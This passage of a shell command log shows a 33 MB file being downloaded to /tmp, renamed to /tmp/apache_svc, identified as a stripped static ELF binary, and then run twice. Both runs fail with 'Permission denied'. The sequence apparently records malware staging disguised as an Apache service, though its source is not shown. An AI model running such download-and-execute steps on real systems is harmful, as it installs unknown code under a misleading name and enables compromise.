 22050K .......... .......... .......... .......... .......... 68% 27.3M 3s
 22100K .......... .......... .......... .......... .......... 68% 21.3M 3s
 22150K .......... .......... .......... .......... .......... 68% 12.8M 3s
 22200K .......... .......... .......... .......... .......... 68% 1.75M 3s
 22250K .......... .......... .......... .......... .......... 68% 2.29M 3s
 22300K .......... .......... .......... .......... .......... 69% 2.57M 3s
 22350K .......... .......... .......... .......... .......... 69% 40.9M 3s
 22400K .......... .......... .......... .......... .......... 69% 11.2M 3s
 22450K .......... .......... .......... .......... .......... 69% 65.2M 3s
 22500K .......... .......... .......... .......... .......... 69% 20.2M 3s
 22550K .......... .......... .......... .......... .......... 69% 10.9M 3s
 22600K .......... .......... .......... .......... .......... 69%  967K 3s
 22650K .......... .......... .......... .......... .......... 70% 27.1M 3s
 22700K .......... .......... .......... .......... .......... 70% 2.00M 3s
 22750K .......... .......... .......... .......... .......... 70% 28.8M 3s
 22800K .......... .......... .......... .......... .......... 70% 12.4M 3s
 22850K .......... .......... .......... .......... .......... 70% 27.5M 3s
 22900K .......... .......... .......... .......... .......... 70% 12.3M 3s
 22950K .......... .......... .......... .......... .......... 71%  860K 3s
 23000K .......... .......... .......... .......... .......... 71% 33.4M 3s
 23050K .......... .......... .......... .......... .......... 71% 2.02M 3s
 23100K .......... .......... .......... .......... .......... 71% 29.3M 3s
 23150K .......... .......... .......... .......... .......... 71% 11.8M 3s
 23200K .......... .......... .......... .......... .......... 71% 22.9M 3s
 23250K .......... .......... .......... .......... .......... 71% 18.3M 3s
 23300K .......... .......... .......... .......... .......... 72% 1.32M 3s
 23350K .......... .......... .......... .......... .......... 72% 3.20M 3s
 23400K .......... .......... .......... .......... .......... 72% 26.6M 3s
 23450K .......... .......... .......... .......... .......... 72% 2.04M 3s
 23500K .......... .......... .......... .......... .......... 72% 24.6M 3s
 23550K .......... .......... .......... .......... .......... 72% 16.5M 3s
 23600K .......... .......... .......... .......... .......... 73% 13.8M 3s
 23650K .......... .......... .......... .......... .......... 73% 12.4M 2s
 23700K .......... .......... .......... .......... .......... 73% 1.07M 2s
 23750K .......... .......... .......... .......... .......... 73% 33.4M 2s
 23800K .......... .......... .......... .......... .......... 73% 2.16M 2s
 23850K .......... .......... .......... .......... .......... 73% 29.7M 2s
 23900K .......... .......... .......... .......... .......... 73% 26.6M 2s
 23950K .......... .......... .......... .......... .......... 74% 16.9M 2s
 24000K .......... .......... .......... .......... .......... 74% 13.0M 2s
 24050K .......... .......... .......... .......... .......... 74% 1.41M 2s
 24100K .......... .......... .......... .......... .......... 74% 4.24M 2s
 24150K .......... .......... .......... .......... .......... 74% 26.6M 2s
 24200K .......... .......... .......... .......... .......... 74% 2.48M 2s
 24250K .......... .......... .......... .......... .......... 75% 24.4M 2s
 24300K .......... .......... .......... .......... .......... 75% 34.0M 2s
 24350K .......... .......... .......... .......... .......... 75% 13.0M 2s
 24400K .......... .......... .......... .......... .......... 75% 12.0M 2s
 24450K .......... .......... .......... .......... .......... 75% 1.15M 2s
 24500K .......... .......... .......... .......... .......... 75% 27.0M 2s
 24550K .......... .......... .......... .......... .......... 75% 2.18M 2s
 24600K .......... .......... .......... .......... .......... 76% 36.2M 2s
 24650K .......... .......... .......... .......... .......... 76% 25.7M 2s
 24700K .......... .......... .......... .......... .......... 76% 25.1M 2s
 24750K .......... .......... .......... .......... .......... 76% 12.3M 2s
 24800K .......... .......... .......... .......... .......... 76% 1.56M 2s
 24850K .......... .......... .......... .......... .......... 76% 3.09M 2s
 24900K .......... .......... .......... .......... .......... 77% 37.1M 2s
 24950K .......... .......... .......... .......... .......... 77% 1.97M 2s
 25000K .......... .......... .......... .......... .......... 77% 29.5M 2s
 25050K .......... .......... .......... .......... .......... 77% 27.4M 2s
 25100K .......... .......... .......... .......... .......... 77% 18.6M 2s
 25150K .......... .......... .......... .......... .......... 77% 12.4M 2s
 25200K .......... .......... .......... .......... .......... 77% 1.02M 2s
 25250K .......... .......... .......... .......... .......... 78% 5.16M 2s
 25300K .......... .......... .......... .......... .......... 78% 46.1M 2s
 25350K .......... .......... .......... .......... .......... 78% 1.59M 2s
 25400K .......... .......... .......... .......... .......... 78% 40.2M 2s
 25450K .......... .......... .......... .......... .......... 78% 27.8M 2s
 25500K .......... .......... .......... .......... .......... 78% 16.9M 2s
 25550K .......... .......... .......... .......... .......... 79% 12.3M 2s
 25600K .......... .......... .......... .......... .......... 79%  892K 2s
 25650K .......... .......... .......... .......... .......... 79% 32.4M 2s
 25700K .......... .......... .......... .......... .......... 79% 34.2M 2s
 25750K .......... .......... .......... .......... .......... 79% 1.60M 2s
 25800K .......... .......... .......... .......... .......... 79% 25.1M 2s
 25850K .......... .......... .......... .......... .......... 80% 27.6M 2s
 25900K .......... .......... .......... .......... .......... 80% 14.3M 2s
 25950K .......... .......... .......... .......... .......... 80% 12.5M 2s
 26000K .......... .......... .......... .......... .......... 80%  959K 2s
 26050K .......... .......... .......... .......... .......... 80% 31.4M 2s
 26100K .......... .......... .......... .......... .......... 80% 1.62M 2s
 26150K .......... .......... .......... .......... .......... 80% 35.7M 2s
 26200K .......... .......... .......... .......... .......... 81% 28.1M 2s
 26250K .......... .......... .......... .......... .......... 81% 28.3M 2s
 26300K .......... .......... .......... .......... .......... 81% 12.5M 2s
 26350K .......... .......... .......... .......... .......... 81% 12.9M 2s
 26400K .......... .......... .......... .......... .......... 81% 1.07M 2s
 26450K .......... .......... .......... .......... .......... 81% 28.5M 2s
 26500K .......... .......... .......... .......... .......... 82% 37.0M 2s
 26550K .......... .......... .......... .......... .......... 82% 1.71M 2s
 26600K .......... .......... .......... .......... .......... 82% 38.1M 2s
 26650K .......... .......... .......... .......... .......... 82% 23.5M 2s
 26700K .......... .......... .......... .......... .......... 82% 13.1M 2s
 26750K .......... .......... .......... .......... .......... 82% 13.7M 2s
 26800K .......... .......... .......... .......... .......... 82% 1.16M 2s
 26850K .......... .......... .......... .......... .......... 83% 50.4M 2s
 26900K .......... .......... .......... .......... .......... 83% 26.3M 2s
 26950K .......... .......... .......... .......... .......... 83% 1.54M 2s
 27000K .......... .......... .......... .......... .......... 83% 22.7M 1s
 27050K .......... .......... .......... .......... .......... 83% 36.1M 1s
 27100K .......... .......... .......... .......... .......... 83% 13.1M 1s
 27150K .......... .......... .......... .......... .......... 84% 12.5M 1s
 27200K .......... .......... .......... .......... .......... 84% 1.20M 1s
 27250K .......... .......... .......... .......... .......... 84% 42.1M 1s
 27300K .......... .......... .......... .......... .......... 84% 26.2M 1s
 27350K .......... .......... .......... .......... .......... 84% 1.66M 1s
 27400K .......... .......... .......... .......... .......... 84% 26.7M 1s
 27450K .......... .......... .......... .......... .......... 84% 28.8M 1s
 27500K .......... .......... .......... .......... .......... 85% 18.9M 1s
 27550K .......... .......... .......... .......... .......... 85% 12.2M 1s
 27600K .......... .......... .......... .......... .......... 85% 1.05M 1s
 27650K .......... .......... .......... .......... .......... 85% 9.34M 1s
 27700K .......... .......... .......... .......... .......... 85% 43.2M 1s
 27750K .......... .......... .......... .......... .......... 85% 1.28M 1s
 27800K .......... .......... .......... .......... .......... 86% 33.8M 1s
 27850K .......... .......... .......... .......... .......... 86% 26.6M 1s
 27900K .......... .......... .......... .......... .......... 86% 18.8M 1s
 27950K .......... .......... .......... .......... .......... 86% 12.5M 1s
 28000K .......... .......... .......... .......... .......... 86% 11.0M 1s
 28050K .......... .......... .......... .......... .......... 86%  913K 1s
 28100K .......... .......... .......... .......... .......... 86% 45.9M 1s
 28150K .......... .......... .......... .......... .......... 87% 26.1M 1s
 28200K .......... .......... .......... .......... .......... 87% 1.40M 1s
 28250K .......... .......... .......... .......... .......... 87% 26.7M 1s
 28300K .......... .......... .......... .......... .......... 87% 23.5M 1s
 28350K .......... .......... .......... .......... .......... 87% 13.6M 1s
 28400K .......... .......... .......... .......... .......... 87% 12.8M 1s
 28450K .......... .......... .......... .......... .......... 88%  952K 1s
 28500K .......... .......... .......... .......... .......... 88% 35.2M 1s
 28550K .......... .......... .......... .......... .......... 88% 25.8M 1s
 28600K .......... .......... .......... .......... .......... 88% 1.71M 1s
 28650K .......... .......... .......... .......... .......... 88% 36.5M 1s
 28700K .......... .......... .......... .......... .......... 88% 26.0M 1s
 28750K .......... .......... .......... .......... .......... 88% 18.8M 1s
 28800K .......... .......... .......... .......... .......... 89% 12.3M 1s
 28850K .......... .......... .......... .......... .......... 89% 12.6M 1s
 28900K .......... .......... .......... .......... .......... 89% 1.22M 1s
 28950K .......... .......... .......... .......... .......... 89% 38.9M 1s
 29000K .......... .......... .......... .......... .......... 89% 29.0M 1s
 29050K .......... .......... .......... .......... .......... 89% 2.23M 1s
 29100K .......... .......... .......... .......... .......... 90% 44.1M 1s
 29150K .......... .......... .......... .......... .......... 90% 26.4M 1s
 29200K .......... .......... .......... .......... .......... 90% 12.4M 1s
 29250K .......... .......... .......... .......... .......... 90% 13.2M 1s
 29300K .......... .......... .......... .......... .......... 90% 11.9M 1s
 29350K .......... .......... .......... .......... .......... 90% 1.57M 1s
 29400K .......... .......... .......... .......... .......... 90% 41.7M 1s
 29450K .......... .......... .......... .......... .......... 91% 2.46M 1s
 29500K .......... .......... .......... .......... .......... 91% 34.3M 1s
 29550K .......... .......... .......... .......... .......... 91% 41.4M 1s
 29600K .......... .......... .......... .......... .......... 91% 19.3M 1s
 29650K .......... .......... .......... .......... .......... 91% 12.3M 1s
 29700K .......... .......... .......... .......... .......... 91% 12.1M 1s
 29750K .......... .......... .......... .......... .......... 92% 1.55M 1s
 29800K .......... .......... .......... .......... .......... 92% 34.5M 1s
 29850K .......... .......... .......... .......... .......... 92% 26.1M 1s
 29900K .......... .......... .......... .......... .......... 92% 2.90M 1s
 29950K .......... .......... .......... .......... .......... 92% 27.0M 1s
 30000K .......... .......... .......... .......... .......... 92% 44.2M 1s
 30050K .......... .......... .......... .......... .......... 92% 20.0M 1s
 30100K .......... .......... .......... .......... .......... 93% 12.7M 1s
 30150K .......... .......... .......... .......... .......... 93% 12.9M 1s
 30200K .......... .......... .......... .......... .......... 93% 1.40M 1s
 30250K .......... .......... .......... .......... .......... 93% 27.0M 1s
 30300K .......... .......... .......... .......... .......... 93% 28.3M 1s
 30350K .......... .......... .......... .......... .......... 93% 2.54M 1s
 30400K .......... .......... .......... .......... .......... 94% 28.1M 1s
 30450K .......... .......... .......... .......... .......... 94% 36.4M 1s
 30500K .......... .......... .......... .......... .......... 94% 21.8M 0s
 30550K .......... .......... .......... .......... .......... 94% 11.1M 0s
 30600K .......... .......... .......... .......... .......... 94% 9.64M 0s
 30650K .......... .......... .......... .......... .......... 94% 1.10M 0s
 30700K .......... .......... .......... .......... .......... 94% 25.3M 0s
 30750K .......... .......... .......... .......... .......... 95% 47.5M 0s
 30800K .......... .......... .......... .......... .......... 95% 1.98M 0s
 30850K .......... .......... .......... .......... .......... 95% 32.5M 0s
 30900K .......... .......... .......... .......... .......... 95% 26.7M 0s
 30950K .......... .......... .......... .......... .......... 95% 15.7M 0s
 31000K .......... .......... .......... .......... .......... 95% 12.0M 0s
 31050K .......... .......... .......... .......... .......... 96% 7.15M 0s
 31100K .......... .......... .......... .......... .......... 96%  976K 0s
 31150K .......... .......... .......... .......... .......... 96% 30.2M 0s
 31200K .......... .......... .......... .......... .......... 96% 35.5M 0s
 31250K .......... .......... .......... .......... .......... 96% 2.16M 0s
 31300K .......... .......... .......... .......... .......... 96% 33.5M 0s
 31350K .......... .......... .......... .......... .......... 96% 26.6M 0s
 31400K .......... .......... .......... .......... .......... 97% 17.5M 0s
 31450K .......... .......... .......... .......... .......... 97% 12.0M 0s
 31500K .......... .......... .......... .......... .......... 97% 12.9M 0s
 31550K .......... .......... .......... .......... .......... 97%  955K 0s
 31600K .......... .......... .......... .......... .......... 97% 34.1M 0s
 31650K .......... .......... .......... .......... .......... 97% 27.3M 0s
 31700K .......... .......... .......... .......... .......... 98% 2.42M 0s
 31750K .......... .......... .......... .......... .......... 98% 34.0M 0s
 31800K .......... .......... .......... .......... .......... 98% 26.2M 0s
 31850K .......... .......... .......... .......... .......... 98% 18.7M 0s
 31900K .......... .......... .......... .......... .......... 98% 13.0M 0s
 31950K .......... .......... .......... .......... .......... 98% 12.3M 0s
 32000K .......... .......... .......... .......... .......... 99% 13.1M 0s
 32050K .......... .......... .......... .......... .......... 99% 1.12M 0s
 32100K .......... .......... .......... .......... .......... 99% 24.2M 0s
 32150K .......... .......... .......... .......... .......... 99% 2.61M 0s
 32200K .......... .......... .......... .......... .......... 99% 33.1M 0s
 32250K .......... .......... .......... .......... .......... 99% 41.0M 0s
 32300K .......... .......... .......... .......... .......... 99% 23.1M 0s
 32350K .......... .......... ..                              100% 11.9M=8.6s

2026-04-22 12:24:23 (3.66 MB/s) - ‘/tmp/xd’ saved [33149076/33149076]
----------------------------------------
[2026-04-22 12:26:00]
COMMAND: mv /tmp/xd /tmp/apache_svc && file  /tmp/apache_svc && chmod +X /tmp/apache_svc && /tmp/apache_svc
EXIT CODE: 126
STDOUT:
/tmp/apache_svc: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
STDERR:
/bin/sh: /tmp/apache_svc: Permission denied
----------------------------------------
[2026-04-22 12:27:37]
COMMAND: chmod +x /tmp/apache_svc && /tmp/apache_svc
EXIT CODE: 126
STDOUT:
(no output)
STDERR:
/bin/sh: /tmp/apache_svc: Permission denied
----------------------------------------
